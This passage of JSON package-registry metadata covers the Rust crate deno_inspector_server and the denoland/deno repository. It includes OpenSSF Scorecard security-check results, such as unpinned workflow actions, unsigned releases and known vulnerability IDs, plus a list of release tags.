ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12939304,"name":"deno_inspector_server","ecosystem":"cargo","description":"Inspector server for Deno runtime","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":32,"first_release_published_at":"2026-01-22T20:07:04.297Z","latest_release_published_at":"2026-08-27T15:21:26.687Z","latest_release_number":"0.32.0","last_synced_at":"2026-08-29T21:56:49.393Z","created_at":"2026-01-28T00:26:22.341Z","updated_at":"2026-08-29T21:56:49.394Z","registry_url":"https://crates.io/crates/deno_inspector_server/","install_command":"cargo install deno_inspector_server","documentation_url":"https://docs.rs/deno_inspector_server/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://code